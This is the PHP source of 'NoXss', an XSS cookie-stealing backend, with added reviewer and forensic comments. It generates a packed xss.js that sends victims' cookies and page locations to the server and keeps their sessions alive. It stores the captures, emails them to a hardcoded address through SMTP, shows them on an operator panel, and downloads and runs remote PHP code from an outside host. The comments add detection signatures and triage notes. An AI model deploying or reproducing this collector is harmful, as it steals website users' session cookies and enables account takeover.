NoXss Vol1.0

<?php 
// Silences every PHP notice, warning and error for the rest of the request, so the unset
// variables and failed file operations further down produce no visible output.
error_reporting(0); 
date_default_timezone_set('Asia/Shanghai');  

// SETTING
// $password is the value AppCheck() compares with md5(md5($_GET['pass'])). Left empty as here,
// that comparison can never succeed, because md5() never returns an empty string.
$password = ''; // PASSWORD OF DOUBLE MD5
$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE
$smtpserverport = 25; // SMTP PORT
$smtpusermail = 'noevilsparrow@yahoo.cn'; // SENDER ADDRESS (second argument of sendmail() in AppSendMail)
$smtpemailto = 'inoevil@qq.com'; // SENT TO
$smtpuser = 'noevilsparrow@yahoo.cn'; // SMTP LOGIN (fourth constructor argument of smtp)
$smtppass = ''; // SMTP PASS


// INIT
// $shell is "<Host header><script path>". HTTP_HOST is copied from the request, so it is
// client-supplied; the value is later written into xss.js and into the notification mail.
$shell = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
// $path is $shell cut at its last '/', i.e. the directory part of the same URL.
$path = substr($shell, 0, strrpos($_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'], '/'));

// Bootstrap. The three steps are chained with else-if, so at most one of them runs per request.
// Artefacts to look for during triage: 'cookie' and 'session' directories created with a
// requested mode of 0777 (the effective mode depends on umask) relative to the working
// directory, and a 'mail.php' file written by AppGetClass().
if(!file_exists('cookie') && !is_dir('cookie'))
{
	mkdir('cookie',0777);
}
else if(!file_exists('session') && !is_dir('session'))
{
	mkdir('session',0777);
}
else if(!file_exists('mail.php'))
{
	// Downloads remote content and stores it as mail.php; nothing checks what was received.
	AppGetClass('https://files.cnblogs.com/noevil/class.mail.js');
}
// Executes whatever mail.php contains. include only warns when the file is missing,
// and that warning is hidden by error_reporting(0) above.
include ('mail.php');


// GET ACTION
// GET ACTION
// Request dispatcher. Everything is driven by GET parameters, so the traffic is visible in
// web-server access logs wherever query strings are logged:
//   cookie (+ location)  -> store a capture and send a notification mail
//   session              -> refresh the hourly "still alive" marker
//   act=js|view|del      -> operator actions, each gated by AppCheck($password)
//   anything else        -> operator list view, also gated by AppCheck($password)
if (isset($_GET['cookie']))
{
	// GET XSS COOKIE INFO
	// NOTE(review): $xss_ip is first assigned two lines below, so md5() receives an unset
	// variable here; the same holds for every capture handled by this branch.
	$xss_hash = md5($xss_ip);
	$xss_date = date('Y/m/d H:i:s'); 
	$xss_ip = getenv ('REMOTE_ADDR'); 
	// location, Referer and cookie are taken from the request without any validation.
	$xss_location = $_GET['location'];
	$xss_referer = getenv('HTTP_REFERER');
	$xss_cookie = $_GET['cookie']; 
	
	AppSaveXss($xss_hash, $xss_date, $xss_ip, $xss_location, $xss_referer, $xss_cookie);

	// SEND MAIL
	// At file scope this global statement has no effect (unless the file is included from
	// inside a function); $shell is already in scope.
	global $shell;
	// The request values are concatenated into the HTML mail body without escaping.
	$contents = '
		<p>Date : '.$xss_date.'</p>
		<p>IP : '.$xss_ip.'</p>
		<p>Location : '.$xss_location.'</p>
		<p>Referer : '.$xss_referer.'</p>
		<p>Cookie : '.$xss_cookie.'</p>
		<p>Hash : '.md5($xss_ip).'</p>
		<p>NoXss : '.$shell.'</p>
	';
	AppSendMail('A Xss Info Had Got!' ,$contents);
}
else if (isset($_GET['session']))
{
	// KEEP SESSION
	// The value of 'session' is stored in $xss_cookie but not used afterwards, and $xss_ip
	// is not assigned anywhere in this branch, so AppKeepSession() receives an unset value.
	$xss_cookie = $_GET['session']; 
	AppKeepSession($xss_ip); 
}
// $_GET['act'] is read without isset(); the resulting notice is hidden by error_reporting(0).
else if ($_GET['act'] == 'js')
{
	// RECREATE XSS.JS
	if (AppCheck($password)) AppCreateJs(); 
}
else if ($_GET['act'] == 'view')
{
	// VIEW NOC LIST
	if (AppCheck($password)) AppReadNox(); 
}
else if ($_GET['act'] == 'del')
{
	// DELETE NOC FILE
	if (AppCheck($password)) AppDelNox(); 
}
else
{
	// CHECK LOGIN
	if (AppCheck($password)) AppViewXss();
}

// CHECK LOGIN
/**
 * Gate for the operator actions: compares md5(md5($_GET['pass'])) with the expected hash.
 *
 * @param string $_p expected double-MD5 hash (the callers pass the configured $password)
 * @return true|null true on a match; on a mismatch a message is echoed and the function
 *                   falls off the end, which callers treat as "not allowed"
 *
 * NOTE(review): the password is sent in the query string, so it is recorded wherever URLs
 * are logged (access logs, proxies, Referer headers), and the hashes are compared with a
 * loose `!=` instead of a strict, constant-time comparison.
 */
function AppCheck($_p)
{
	$pwd = $_GET['pass'];
	if (md5(md5($pwd)) != $_p)
	{
		echo 'Fuck You!';
	}
	else
	{
		return true;
	}
}

// SAVE XSS
/**
 * Appends one capture record to ./cookie/<Y-m-d-H-i-s>.noc.
 *
 * Line layout of the record (AppViewXss reads the file back by line index):
 *   0 hash, 1 "Date: ...", 2 "IP: ...", 3 "Location: ...", 4 "Referer: ...", 5 "Cookie: ..."
 *
 * @param string $_h hash line
 * @param string $_d capture date
 * @param string $_i client address
 * @param string $_l value of the 'location' request parameter
 * @param string $_r Referer header
 * @param string $_c value of the 'cookie' request parameter
 *
 * Forensic note: timestamp-named *.noc files under a 'cookie' directory are the on-disk
 * artefact of this collector.
 */
function AppSaveXss($_h, $_d, $_i, $_l, $_r, $_c)
{
	// The name has one-second resolution and the file is opened in append mode, so captures
	// arriving within the same second end up in the same file. The fopen() result is not checked.
	$fp = fopen('./cookie/'.date("Y-m-d-H-i-s").'.noc', 'a'); 
	// All fields are written verbatim: a line break inside any request value shifts the line
	// positions that the list view relies on.
	fwrite($fp, $_h."\r\n");
	fwrite($fp, 'Date: '.$_d."\r\n");
	fwrite($fp, 'IP: '.$_i."\r\n");
	fwrite($fp, 'Location: '.$_l."\r\n");
	fwrite($fp, 'Referer: '.$_r."\r\n");		
	fwrite($fp, 'Cookie: '.$_c);
	fclose($fp);
}

// SEND MAIL 
/**
 * Sends an HTML mail through the SMTP account configured at the top of the file.
 *
 * @param string $_t subject
 * @param string $_c HTML body
 *
 * The smtp class is not defined in this file; presumably it comes from the downloaded
 * mail.php (TODO confirm). Network indicator: an outbound SMTP connection from the web
 * server process to $smtpserver on $smtpserverport for every stored capture.
 */
function AppSendMail($_t, $_c)
{
	global $smtpserver;
	global $smtpserverport;
	global $smtpusermail;
	global $smtpemailto;
	global $smtpuser;
	global $smtppass;

	// NOTE(review): the meaning of the third argument (true) depends on the smtp class,
	// which is not visible here.
	$smtp = new smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
	$smtp->debug = FALSE;
	$smtp->sendmail($smtpemailto, $smtpusermail, $_t, $_c, 'HTML');
}

// VIEW OUTPUT
/**
 * Prints the operator page: a header with configuration details, followed by one table row
 * per stored capture (newest directory entry last in AppGetNox() order, rendered in reverse).
 *
 * NOTE(review): every value shown here - request headers from $_SERVER and the lines read
 * back from the .noc files - is written into the HTML without escaping. The stored lines
 * originate from third-party requests, so the page and the files should be handled as
 * untrusted content (e.g. inspected as plain text) during analysis.
 */
function AppViewXss()
{
	global $smtpusermail;
	global $smtpemailto;
	
	// OUTPUT HEADER
	print_r('
	<HTML>
	<HEAD>
	<TITLE>NoXss</TITLE>
	<STYLE type="text/css">
	body,th,td {
		font:12px Verdana,Tahoma,sans-serif;
		color:black;
		line-height:140%;
	}
	.info li {
		line-height:35px;
		border-bottom:1px dashed #DDD;
		border-bottom-width:1px;
		border-bottom-style:dashed;
		border-bottom-color:#DDD;
		clear:both;
	}
	th {
		font-weight:bold;
		text-align:left;
	}
	th,td {
		line-height:35px;
		border-bottom:1px dashed #DDD;
		border-bottom-width:1px;
		border-bottom-style:dashed;
		border-bottom-color:#DDD;
		clear:both;
	}
	ul,ol {
		list-style:none;
		list-style-type:none;
		list-style-position:initial;
		list-style-image:initial;
	}
	li {
		display:list-item;
	}
	</STYLE>
	</HEAD>
	<BODY>
	');

	print_r('<ul class="info">');
	
	// OUTPUT SIMPLE INFO
	global $path;
	// Base names (without extension) of the files in ./cookie/.
	$noc = AppGetNox('cookie');
	
	// gethostbyname() performs a name lookup on every page view. The "Creat Js" link is built
	// from REQUEST_URI, which already carries the pass parameter checked by AppCheck().
	print_r('
	<li><h1>NoXss</h1></li>
	<li>
	Date: <font color="#CC0000">'.date('Y/m/d H:i:s').' </font>
	Host: <font color="#CC0000">'.$_SERVER['HTTP_HOST'].' ('.gethostbyname($_SERVER['SERVER_NAME']).') </font>
	Count: <font color="#CC0000">'.count($noc).' </font>
	</li>
	<li>
	SEND USER: <font color="#CC0000">'.$smtpusermail.' </font>
	SEND TO: <font color="#CC0000">'.$smtpemailto.' </font>
	</li>
	<li>Use Example: <font color="#CC0000"><SCRIPT SRC="HTTP://'.$path.'/xss.js"></SCRIPT> </font>
	[<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'].'&act=js">Creat Js</a>]</li>
	');
	
	// OUTPUT TABLE HEADER
	print_r('
	<li>
	<table>
	<tr>
	<th width="180px">Name</th>
	<th width="200px">Date</th>
	<th width="150px">Ip </th>
	<th width="420px">Referer</th>
	<th width="100px">Status</th>
	<th width="100px">Action</th>
	</tr>	
	');
	
	// OUTPUT NOC LIST
	// Walk the listing backwards so the last directory entry is rendered first.
	for ($i=count($noc)-1; $i>=0; $i--)
	{
		// READ NOC FILE
		$nocfile = file('./cookie/'.$noc[$i].'.noc');
		$j = 0;
		// Copy the lines into $nocdata by index. $nocdata is never cleared between files, so a
		// record with fewer lines keeps the values left over from the previously rendered one.
		foreach($nocfile as &$line)
		{
			$nocdata[$j] = $line;
			$j++;
		}
	
		// Indices follow the layout written by AppSaveXss(): 0 hash, 1 Date, 2 IP, 4 Referer.
		// The View/Delete links again reuse REQUEST_URI, including its pass parameter.
		print_r('
		<tr>
		<td>['.$noc[$i].']</td>
		<td>'.$nocdata[1].'</td>
		<td>'.$nocdata[2].'</td>
		<td title="'.$nocdata[4].'">'.AppSubStr($nocdata[4], 0, 55).'</td>
		<td>'.AppCheckStatus($nocdata[0]).'</td>
		<td>[
		<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=view&noc='.$noc[$i].'" target="_blank">
		<font color="#ff6600">View</font></a> | 
		<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=del&noc='.$noc[$i].'">
		<font color="#ff6600">Delete</font></a>
		]</td>
		</tr>
		');
	}
	
	// OUTPUT FOOTER
	print_r('
	</table></li>
	<li><font color="#DDDDDD">Code By : NoevilSparrow @:no3er@qq.com Version: 1.0</font></li>
	</ul></BODY></HTML>
	');
}

// KEEP SESSION
/**
 * Records an hourly "seen" marker: ./session/<YmdH>/<md5($_c)>.nos.
 *
 * When the directory for the current hour does not exist yet, it is created and every other
 * sub-directory of ./session/ is removed, so markers live for at most the current hour.
 * AppCheckStatus() looks for the same file to decide between "Keeping" and "Lost".
 *
 * @param string $_c value that is hashed into the marker file name
 */
function AppKeepSession($_c)
{
	$session_hash = md5($_c);
	
	// CLEAN SESSION
	if (!is_dir('session/'.date('YmdH')))
	{
		// CREATE FOLDER AND DELETE OTHERS
		mkdir('session/'.date('YmdH'));
		// Errors from the directory functions are suppressed with @ and not checked.
		$handle = @opendir('./session/');
		// The loop condition is a plain assignment, so it ends at the first falsy return value.
		for ($i=0; $dir = @readdir($handle); $i++)
		{ 
			if (@is_dir('./session/'.$dir) && $dir!='.' && $dir!='..')
			{
				if ($dir != date('YmdH'))
				{
					AppCleanSession('./session/'.$dir);
				}
			}				
		} 
		closedir($handle);
	}
	
	// RECORD SESSION
	// The marker is written once per hash and hour; its content is the hash itself.
	if (!file_exists('./session/'.date('YmdH').'/'.$session_hash.'.nos'))
	{
		$fp = fopen('./session/'.date('YmdH').'/'.$session_hash.'.nos', 'a'); 
		fwrite($fp, $session_hash);
		fclose($fp);
	}
	
}

// CLEAN SESSION
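/**
 * Recursively deletes a directory and everything below it.
 *
 * @param string $_d directory to remove
 * @return bool true when the directory itself was removed, false otherwise
 */
function AppCleanSession($_d)
{
	// Refuse anything that is not a directory instead of handing a failed handle to readdir()
	if (!is_dir($_d))
	{
		return false;
	}

	$dh = opendir($_d);
	if ($dh === false)
	{
		return false;
	}

	// Compare with false explicitly: an entry named "0" is falsy and would otherwise
	// end the loop early and leave the directory non-empty
	while (($file = readdir($dh)) !== false)
	{
		if ($file == '.' || $file == '..')
		{
			continue;
		}

		$fullpath = $_d.'/'.$file;
		// Only descend into real directories; a symbolic link is removed as a link so the
		// deletion never leaves the tree that was asked for
		if (is_dir($fullpath) && !is_link($fullpath))
		{
			AppCleanSession($fullpath);
		}
		else
		{
			unlink($fullpath);
		}
	}
	closedir($dh);

	return rmdir($_d);
}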

// CHECK STATUS
/**
 * Builds the status cell for one capture.
 *
 * Looks for the marker ./session/<YmdH>/<hash>.nos of the current hour and returns the
 * "Keeping" snippet when it exists, the "Lost" snippet otherwise.
 *
 * @param string $_h hash line of a capture record; surrounding whitespace is trimmed
 * @return string HTML fragment
 */
function AppCheckStatus($_h)
{
	$marker = './session/'.date('YmdH').'/'.trim($_h).'.nos';

	return file_exists($marker)
		? '<font color="#006600">Keeping</font>'
		: '<font color="#0000FF">Lost</font>';
}

// READ NOC LIST
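/**
 * Lists the entries of a directory by base name.
 *
 * Each name is cut at its first dot; '.', '..' and 'Thumbs.db' are skipped. The order is
 * whatever readdir() yields, it is not sorted.
 *
 * @param string $_p directory to list
 * @return array list of base names; empty when the directory is missing, unreadable or empty
 */
function AppGetNox($_p)
{
	// Always hand back an array so callers can count() and index the result safely
	$_r = array();

	if (!is_dir($_p))
	{
		return $_r;
	}

	$handle = opendir($_p);
	if ($handle === false)
	{
		return $_r;
	}

	while (($file = readdir($handle)) !== false)
	{
		if ($file != "." && $file != ".." && $file != "Thumbs.db")
		{
			// Keep only the part in front of the first dot
			$temp = explode('.', $file);
			$_r[] = $temp[0];
		}
	}
	closedir($handle);

	return $_r;
}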

// DOWNLOAD MAIL CLASS
/**
 * Downloads the content at $_u and writes it to 'mail.php' in the working directory.
 *
 * The caller includes mail.php right afterwards, so whatever the remote URL serves is
 * executed as PHP; there is no checksum, signature or content check in between.
 *
 * Defensive notes: opening a URL with fopen() only works while allow_url_fopen is enabled,
 * so disabling it blocks this step. An outbound HTTP(S) request made by the web server
 * process followed by a new mail.php next to the script is the observable trace.
 *
 * @param string $_u URL to fetch
 */
function AppGetClass($_u)
{         
	$file = fopen ($_u, 'rb');         
	if ($file) 
	{         
		$fp = fopen('mail.php', 'wb');         
		// The brace-less if governs the whole while loop: data is copied only when the
		// local file could be opened.
		if ($fp)         
		while(!feof($file)) 
		{         
			// Copy in chunks of at most 8 KiB.
			fwrite($fp, fread($file, 1024*8 ), 1024*8);         
		}         
	}         
	if ($file) 
	{         
		fclose($file);         
	}         
	// NOTE(review): $fp is only assigned when the download handle was opened; otherwise
	// this reads an unset variable (notice hidden by error_reporting(0)).
	if ($fp) 
	{         
		fclose($fp);
	}
}

// RE CREATE XSS.JS
/**
 * (Re)writes 'xss.js' in the working directory and then sends the browser back one page.
 *
 * The file consists of two statements: an assignment of _u to "http://" + $shell (this
 * script's URL, built from the request's Host header) and a script packed with the common
 * eval(function(p,a,c,k,e,d){...}) packer. The packer's word table names cookie, location,
 * session, XMLHttpRequest, setInterval and 60000, which matches the 'cookie', 'location'
 * and 'session' parameters handled by the dispatcher above - inferred from the table, the
 * payload is not unpacked here.
 *
 * Detection note: a script body that starts with `var _u = "http://` directly followed by
 * the p,a,c,k,e,d packer prologue is a content signature for this file.
 */
function AppCreateJs()
{
	global $shell;
	// The fopen() result is not checked before writing.
	$fp = fopen('xss.js', 'w'); 
	fwrite($fp, 'var _u = "http://'.$shell.'";');
	fwrite($fp, 'eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'1 6="3="+9(b.3)+"&8="+l.8;1 i="m="+9(b.3);1 0=a 7();1 2=a 7();5();e();4 5(){0.c("j",k+"?"+6,g);0.h(d);p 0}4 f(){2.c("j",k+"?"+i,g);2.h(d)}4 e(){n.q("f()",o)}\',27,27,\'_hc|var|_hs|cookie|function|C|_c|XMLHttpRequest|location|escape|new|document|open|null|K|S|true|send|_s|GET|_u|top|session|window|60000|delete|setInterval\'.split(\'|\'),0,{}))
	');
	fclose($fp);
	print_r('<script type="text/javascript">history.back();</script>');
	
}

// STRING SUB
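/**
 * Character-aware substring that marks truncation with '...'.
 *
 * The text is split into characters with a regular expression, so multi-byte UTF-8
 * characters count as one. As '.' does not match a line feed, line feeds are dropped.
 * The ellipsis is appended only when characters after the requested window are cut off.
 *
 * @param string   $_s text to cut
 * @param int      $_f start offset in characters
 * @param int|null $_l maximum number of characters, null for "to the end"
 * @return string
 */
function AppSubStr($_s, $_f, $_l = null)
{
	// With /u the whole match fails on invalid UTF-8; fall back to a byte-wise split
	// instead of counting a result that was never produced
	$matched = preg_match_all('/./u', (string) $_s, $match);
	if ($matched === false)
	{
		preg_match_all('/./', (string) $_s, $match);
	}
	$chars = isset($match[0]) ? $match[0] : array();

	// Everything from the start offset onwards
	$tail = array_slice($chars, $_f);

	if (is_null($_l) || count($tail) <= $_l)
	{
		// Nothing is cut off, so no ellipsis
		return implode('', $tail);
	}

	return implode('', array_slice($tail, 0, $_l)).'...';
}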

// READ NOC FILE
/**
 * Prints the lines of ./cookie/<noc>.noc, each followed by <br>.
 *
 * NOTE(review): the 'noc' request parameter goes into the file path without being reduced
 * to a bare file name, and the stored lines are printed without HTML escaping. The record
 * content comes from third-party requests, so it should be read as plain text rather than
 * rendered in a browser during analysis.
 */
function AppReadNox()
{	
	// The result of file() is not checked; a missing file yields false.
	$nocfile = file('./cookie/'.$_GET['noc'].'.noc');
	foreach($nocfile as &$line)
	{
		print_r($line.'<br>');
	}
}

// DELETE NOC FILE
/**
 * Deletes ./cookie/<noc>.noc and answers with a small script block.
 *
 * On failure the script shows an alert and goes back one page; on success it navigates the
 * top window to the request's Referer.
 *
 * NOTE(review): 'noc' is used in the path without validation, the deletion is triggered by
 * a plain GET request, and the Referer header is placed inside a JavaScript string literal
 * without escaping.
 */
function AppDelNox()
{
	if (!unlink('./cookie/'.$_GET['noc'].'.noc'))
	{
		print_r('<script type="text/javascript">alert("What is the fuck!");history.back();</script>');
	}
	else
	{
		print_r('<script type="text/javascript">top.location="'.getenv('HTTP_REFERER').'";</script>');
	}
}

?>

  
